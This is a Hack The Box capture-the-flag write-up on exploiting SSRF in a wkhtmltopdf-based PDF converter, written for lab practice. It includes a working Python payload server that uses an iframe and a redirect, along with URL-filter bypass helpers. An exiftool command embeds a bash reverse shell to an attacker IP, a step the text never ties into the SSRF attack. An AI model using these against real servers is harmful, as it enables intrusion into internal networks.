Pdfy HTB Writeup (Updated)

This writeup covers the Pdfy challenge from Hack The Box, updated as of April 2026. The challenge centres on Server-Side Request Forgery (SSRF) through a PDF generation service built on a vulnerable version of wkhtmltopdf.

Challenge Overview

The target application is a simple web service that takes a URL and generates a PDF preview of it. Vulnerability class: Server-Side Request Forgery (SSRF). Primary tool on the server side: wkhtmltopdf (v0.12.5 or older). Because the conversion is done by a headless browser engine (Qt WebKit) running on the server, every URL it renders, and every sub-resource, frame or redirect that page pulls in, is fetched from the server's own network position rather than yours.

Reconnaissance

The first step in any successful penetration test is thorough reconnaissance. Upon spinning up the challenge instance, you're greeted by a simple but functional web application. Its purpose is clear: it invites you to input the URL of a website, which it then converts into a downloadable PDF file.

Hosting the payload

To exploit the SSRF you need a web server the target can reach; for CTF challenges, ngrok is the convenient option. ngrok creates a secure tunnel to your local machine, exposing a local web server to the public internet. Submit the ngrok URL to the converter and watch your server's access log: a request whose User-Agent names wkhtmltopdf confirms that the renderer, not your own browser, fetched the page.

Use URL encoding or redirects to evade basic string filters on the submitted URL. A filter that only inspects the string you submit never sees where a 302 from your server sends the renderer, and it will not match a host or path that is spelled differently from the blocked literal.
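As an added example (not code from the original writeup, from Hack The Box, or from the challenge itself), the following Python script is a minimal payload host for the procedure above: it serves an HTML page whose iframe points the renderer at an internal address, answers /redirect with a 302 to that same address, logs every hit together with its User-Agent, and includes two helpers that show why a naive substring filter on the submitted URL is bypassed by percent-encoding or by alternative IPv4 spellings. INTERNAL_TARGET, the /redirect path, port 8000 and NAIVE_BLOCKLIST are assumptions chosen for illustration; the real challenge's endpoints and filter are not taken from the writeup.

```python
"""Hypothetical SSRF payload host for a wkhtmltopdf-based converter (added example).

The converter fetches whatever URL it is given, so we host a page that makes the
renderer issue further requests on our behalf. Two mechanisms are shown:
  1. an <iframe> pointing at an internal address, and
  2. an HTTP 302 redirect, which a string filter on the submitted URL never sees.
INTERNAL_TARGET, /redirect, port 8000 and NAIVE_BLOCKLIST are illustrative assumptions.
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Assumed internal address to reach through the renderer (placeholder, not from the writeup).
INTERNAL_TARGET = "http://127.0.0.1:80/"

# A constructed blocklist of the kind a "basic string filter" would use.
NAIVE_BLOCKLIST = ("localhost", "127.0.0.1", "file://")


def passes_naive_filter(url: str, blocklist=NAIVE_BLOCKLIST) -> bool:
    """True when none of the blocked substrings appear in the submitted URL."""
    low = url.lower()
    return not any(bad in low for bad in blocklist)


def url_encoding_variants(url: str) -> list[str]:
    """Rewrites of `url` that differ as strings but may still resolve to the same place.

    Only the percent-encoded path is equivalent by the URL spec; the decimal and
    hex spellings of a dotted-quad host depend on the client's URL parser, so
    confirm each one against the real renderer before relying on it.
    """
    parts = urlsplit(url)
    variants = []
    # 1. Percent-encode every path character: "/admin" -> "/%61%64%6D%69%6E".
    if parts.path and parts.path != "/":
        enc = "".join(f"%{ord(c):02X}" for c in parts.path.lstrip("/"))
        variants.append(f"{parts.scheme}://{parts.netloc}/{enc}")
    # 2. Alternative spellings of a dotted-quad host (127.0.0.1 -> 2130706433 / 0x7f000001).
    host = parts.hostname or ""
    octets = host.split(".")
    if len(octets) == 4 and all(o.isdigit() for o in octets):
        n = int.from_bytes(bytes(int(o) for o in octets), "big")
        port = f":{parts.port}" if parts.port else ""
        variants.append(f"{parts.scheme}://{n}{port}{parts.path}")        # decimal
        variants.append(f"{parts.scheme}://0x{n:08x}{port}{parts.path}")  # hex
    return variants


def build_payload_html(target: str) -> str:
    """HTML that makes the renderer fetch `target` while it renders our page."""
    return (
        "<html><body><h1>hello</h1>\n"
        f'<iframe src="{target}" width="800" height="600"></iframe>\n'
        "</body></html>\n"
    )


class PayloadHandler(BaseHTTPRequestHandler):
    """Serves the payload page, answers /redirect with a 302, and logs every hit."""

    def do_GET(self):
        ua = self.headers.get("User-Agent", "")
        # A User-Agent naming wkhtmltopdf means the server-side renderer fetched us.
        print(f"[hit] {self.client_address[0]} {self.path} UA={ua!r}")
        if self.path.startswith("/redirect"):
            # The submitted URL was ours; the filter never saw this Location.
            self.send_response(302)
            self.send_header("Location", INTERNAL_TARGET)
            self.end_headers()
            return
        body = build_payload_html(INTERNAL_TARGET).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


if __name__ == "__main__":
    # Expose this port with `ngrok http 8000`, then submit the ngrok URL
    # (or <ngrok-url>/redirect) to the converter.
    HTTPServer(("0.0.0.0", 8000), PayloadHandler).serve_forever()
```

Run the script, start `ngrok http 8000`, and submit the ngrok URL to the converter; the printed hit lines tell you which address the renderer came from and what it claims to be. Only the percent-encoded path variant is guaranteed equivalent by the URL grammar; treat the decimal and hex host spellings as candidates to test against the renderer, not as a given.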

Inspecting the generated PDF

When the application successfully processes a standard external URL (such as a public web server), look closely at the generated PDF's metadata. Download the PDF and inspect it with command-line utilities such as exiftool or pdfinfo, or by checking how the elements are structured. The Creator and Producer fields name the generator and its version, which is how you confirm that wkhtmltopdf 0.12.5 or older is doing the rendering.

exiftool can also write metadata. The following sets the Title field of shell.pdf to a string containing a bash reverse-shell one-liner (10.10.14.xx is a placeholder for your attacking IP and 4444 is the listener port):

    exiftool -Title='test; bash -c "bash -i >& /dev/tcp/10.10.14.xx/4444 0>&1";' shell.pdf
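As an added example (not code from the original writeup or from the challenge), the following Python snippet does the metadata check above without external tools: it pulls the Info dictionary out of a PDF and reads the Creator string, which for wkhtmltopdf output carries the generator name and version. SAMPLE_PDF is a constructed minimal file, and the version and Producer strings in it are placeholders for what you would look for, not values captured from the challenge.

```python
"""Read Creator/Producer/Title out of a PDF's Info dictionary (added example).

wkhtmltopdf builds on Qt WebKit, so its output names the generator in /Creator
and the Qt library in /Producer. SAMPLE_PDF below is constructed for this demo;
its field values are illustrative, not captured from the challenge.
"""
import re
from typing import Optional

# Constructed sample: only the Info object matters to the parser.
SAMPLE_PDF = (
    b"%PDF-1.4\n"
    b"1 0 obj\n<< /Title (test) /Creator (wkhtmltopdf 0.12.5) "
    b"/Producer (Qt 4.8.7) /CreationDate (D:20260401120000Z) >>\nendobj\n"
    b"trailer\n<< /Info 1 0 R >>\n%%EOF\n"
)

# /Key (literal string); the string body allows backslash escapes but not nested parens.
_LITERAL = re.compile(rb"/(\w+)\s*\(((?:\\.|[^\\)])*)\)")


def _unescape(raw: bytes) -> str:
    """Undo the common PDF literal-string escapes: \\( \\) \\n and \\\\."""
    return (raw.replace(b"\\(", b"(").replace(b"\\)", b")")
               .replace(b"\\n", b"\n").replace(b"\\\\", b"\\")
               .decode("latin-1"))


def pdf_info(data: bytes) -> dict[str, str]:
    """Return the literal-string entries of the first dictionary carrying /Creator or /Producer.

    Good enough for uncompressed Info dictionaries (what wkhtmltopdf writes); it does
    not handle object streams, hex strings or a value that itself contains '>>'.
    """
    for m in re.finditer(rb"<<(.*?)>>", data, re.S):
        body = m.group(1)
        if b"/Creator" in body or b"/Producer" in body:
            return {k.decode(): _unescape(v) for k, v in _LITERAL.findall(body)}
    return {}


def generator_version(data: bytes) -> Optional[tuple[str, str]]:
    """('wkhtmltopdf', '0.12.5') when the Creator names wkhtmltopdf, else None."""
    creator = pdf_info(data).get("Creator", "")
    m = re.match(r"(wkhtmltopdf)\s+([\d.]+)", creator)
    return (m.group(1), m.group(2)) if m else None


def is_target_version(version: str) -> bool:
    """True for wkhtmltopdf releases at or below 0.12.5, the range this writeup targets."""
    return tuple(int(x) for x in version.split(".")) <= (0, 12, 5)


if __name__ == "__main__":
    import sys
    path = sys.argv[1] if len(sys.argv) > 1 else None
    data = open(path, "rb").read() if path else SAMPLE_PDF
    print(pdf_info(data))
    gen = generator_version(data)
    if gen:
        print(f"{gen[0]} {gen[1]} -> in-scope version: {is_target_version(gen[1])}")
```

Pass the downloaded PDF as the first argument; with no argument the script parses the constructed sample. For a real file the same fields are what `exiftool` or `pdfinfo` print, so either route gives you the version check.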